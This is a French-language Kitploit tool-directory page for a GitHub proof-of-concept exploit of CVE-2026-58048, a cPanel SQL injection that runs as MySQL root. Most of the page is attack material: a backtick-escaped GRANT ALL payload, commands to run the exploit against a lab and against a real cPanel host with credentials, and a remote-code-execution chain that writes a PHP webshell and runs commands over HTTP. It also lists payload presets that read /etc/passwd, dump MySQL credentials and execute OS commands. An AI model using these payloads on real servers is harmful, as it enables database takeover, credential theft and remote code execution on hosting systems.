Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
POC-CVE-2026-58048 — Projet de recherche en sécurité | Kitploit
Outils/GitHubGitHub/imbas007/poc-cve-2026-58048
Escalade de PrivilègesExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionSécurité des Bases de DonnéesLabs et Pratique
GitHubimbas007/poc-cve-2026-58048

POC-CVE-2026-58048

Projet de recherche en sécurité

Voir le dépôt
16il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-58048

CVSS 4.0 : 9.4 (Critique) | CWE-89 : Injection SQL | NVD

Utilisateur cPanel authentifié → SQL arbitraire en tant que root MySQL via le renommage de base de données. cPanel conserve incorrectement le sql_mode (ANSI_QUOTES) de la session de l'utilisateur lors de l'exécution d'opérations de renommage en tant que root — un backtick dans le nom de la base de données s'échappe de l'identifiant et injecte du SQL.

root@kitploit:~
name: db`; GRANT ALL ON *.* TO 'rce'@'%' IDENTIFIED BY 'pwned!'; -- 

Démarrage rapide (Lab Docker)

root@kitploit:~
pip install -r requirements.txt

python3 simulate.py start   # start lab (MariaDB:13306, cPanel API:18080, Apache:18081)
python3 poc.py -t http://localhost:18080 --mysql-port 13306 --payload admin-user --verify
python3 simulate.py stop

Le mode lab est détecté automatiquement — aucun flag --lab n'est nécessaire.

Cible cPanel réelle

root@kitploit:~
python3 poc.py -t https://cpanel.example.com:2083 -u user -p 'pass' \
    --payload admin-user --verify

Presets de payload

SQL personnalisé : --inject "GRANT ALL ON *.* TO 'x'@'%' IDENTIFIED BY 'y'"

Chaîne RCE complète (Lab)

root@kitploit:~
# 1. Write shell to web root
python3 poc.py -t http://localhost:18080 --mysql-port 13306 \
    --payload webshell --shell /var/www/html/shell.php

# 2. Execute commands via HTTP!
curl "http://localhost:18081/shell.php?0=id"

Versions affectées

cPanel < 11.110.0.137, 11.118.0.71, 11.126.0.78, 11.134.0.48, 11.136.0.32 ; WP Squared < 11.138.1.6

Atténuation : mettez à niveau, ou révoquez la fonctionnalité MySQL aux utilisateurs cPanel.

Références

  • Avis cPanel
  • SecurityOnline

Pour les tests de sécurité autorisés et à des fins éducatives uniquement.

Télécharger l’outil
PresetEffet
admin-user (par défaut)Crée l'utilisateur admin MySQL rce
compact-adminPayload admin court (<64 caractères — respecte la limite de nom du cPanel réel ; vérification : r/p)
webshellÉcrit un shell PHP via INTO OUTFILE (--shell /var/www/html/shell.php)
read-fileLit un fichier serveur via LOAD_FILE (--file /etc/passwd)
dump-usersDump tous les identifiants MySQL vers pwn.users
udf-rceExécution de commandes OS via UDF